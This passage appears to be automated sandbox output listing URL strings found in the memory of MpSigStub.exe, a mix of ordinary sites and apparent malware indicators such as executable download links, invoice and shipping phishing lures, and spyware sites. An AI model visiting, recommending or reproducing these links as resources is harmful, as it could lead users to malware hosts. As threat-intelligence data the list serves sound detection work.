Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.ooooos.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.orkut.com
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://www.paqtool.com/product/keylog/keylog_
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.pardislab.com/ups-us/feb-12-18-04-16-13/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.pasillorosa.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.pc-tune.ch/getip.php
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.p
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.piram.com.br/hosts.txt
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.plattemedia.com/links/site
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.platteregistrations.com/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.plattevalidation.com/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.plattevalidation.com/a
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.plustvarama.com
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.policiajudiciaria.pt/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.pornhub.com/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://www.powernum123.com/download/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.pp1234.net/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.pricemeter.net/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.pricemeter.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.proarama.com
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.public.health.wa.gov.au/3/1428/2/apply_to_install_a_wastewater_system.pm
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://www.qq5.com
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://www.qq994455.com/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://www.radpdf.com
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://www.rakehunter.com/o/file.hta
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.rezababy.blogfa.com
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.rico09.net/nighteyes/96/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.rits.ga/excel/view.php
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://www.ritservice.rua
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.rootkit.net.cn
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.sacbarao.kinghost.net/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://www.sagalasowka.pl/wp-content/uploads/2011/z
Source: MpSigStub.exe, 00000023.00000003.18319810399.0000015B1BE00000.00000004.00000001.sdmp String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.search.ask.com
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://www.seatoskycomputerguy.com/zw/oz/serozv.exe
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://www.seduw.com:
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://www.sitem.biz/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.skkyc2004.cn
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.sniperspy.com/guide.html
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.soporteczamora.com/ups-ship-notification/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.soso.com/q?w=%s&lr=&sc=web&ch=w.p&filter=1&num=10&pg=%d
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.sotrag.eu/invoice
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://www.statuscrew.gr/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.steelbendersrfq.cf/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.stimteam.co.za/images
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.surprisingdd.top
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.symantec.com
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://www.systweak.com/registrycleaner
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www.tagbao.com/open
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.tattoopower.it/invoice-
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.tempuri.org/DataSet1.xsd
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://www.thon-samson.be/js/_notes/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.tijuanalaw.com/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.traramayeri.net
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.tripod.com
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://www.troman.de/cmd/cmds.txt
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://www.turtlecoin.lol
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.ujnc.ru/js.js
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www.universal101.com/upd
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.up.com.jo/gov/lsass.exe
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://www.update-srv.info
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://www.update-srv1.info
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp String found in binary or memory: http://www.usaa.com/inet/
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://www.usatoday.com/search/results?q=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://www.v9.com/v9tb/
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://www.v9tr.com
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.vegascomtelecom.com/novo/get.php
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.virtrigger.com
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://www.virtrigger.coma
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.voxcards.com.br
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://www.wajam.com/webenhancer/logging
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://www.wajam.com/webenhancer/loggingxM
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://www.webflora.co.kr/slog/skin/setup.ini
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://www.webtreats.info/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.webye163.cn
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.win-spy.com/update
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://www.win-touch.com
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: http://www.winferno.com/re/support.asp
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://www.woothemes.com/flexslider/
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.wosss.com/search.aspx?q=%s
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.wuweigame.com/asp/y.js
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.xanga.com
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.xia3.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.xiuzhe.com/ddvan.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://www.xpassgenerator.com/software/d
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://www.xtzspxw.com/admin506/tt.htmwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://www.xupiter.com/d
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.yahoo.com
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.yfdc.com.tw/wp-content/uploads/2015/11/z.htm
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.yihaha.net/
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://www.youtoba01.hpg.com.br
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.yuyu.com/?fav2
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
